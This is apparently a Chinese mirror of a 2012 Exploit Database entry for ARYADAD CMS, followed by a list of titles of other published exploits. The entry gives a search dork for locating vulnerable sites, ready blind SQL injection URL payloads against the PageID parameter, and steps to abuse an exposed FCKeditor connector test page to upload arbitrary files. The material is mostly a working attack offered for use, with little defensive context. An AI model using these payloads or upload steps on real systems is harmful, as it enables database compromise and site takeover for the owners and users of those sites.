ARYADAD – Multiple Vulnerabilities

Exploit Database
12 阅读

作者： Red Security TEAM

日期： 2012-01-21
类别：
- webapps
平台：
- asp
来源：https://www.exploit-db.com/exploits/18405/

# 
# Title : ARYADAD Multi Vulnerability
# Author: Red Security TEAM
# Date: 21/01/2012
# Vendor: http://cms.aryadad.com/
# Tested On : Windows Server 2008 (IIS 7.5)
# Dork: Powered by ARYADAD Corporation
# Contact : Info [ 4t ] RedSecurity [ d0t ] COM
# Home: http://RedSecurity.COM
#
# Exploit :
# 
# I : Blind SQL Injection Vulnerability
# True: http://server/Default.aspx?PageID=117' and 1-1 = '0
# False : http://server/Default.aspx?PageID=117' and 2-1 = '0
#
# II: File Upload Vulnerability
# 1. Go to: /FA/fckeditor/editor/filemanager/connectors/test.html
# 2. Set Connector To ASP.Net and upload your file , You can see your uploaded files in FA/userfiles/file/
#

last Exploits
ARYADAD – Multiple Vulnerabilities的更多信息

FlashChat 6.0.2 < 6.0.8 - Arbitrary File Upload：
Symantec Web Gateway 5.0.2 – Local/Remote File Inclusion / Remote Code Execution：
ab Web CMS 1.35 – Multiple Vulnerabilities：
SynaMan 4.0 build 1488 – SMTP Credential Disclosure：
Employee Management System v1 – ’email’ SQL Injection：
Online Learning Management System 1.0 – RCE (Authenticated)：
EggBlog 4.1.2 – Arbitrary File Upload：
Affiliate Store Builder – ‘edit_cms.php’ Multiple SQL Injections：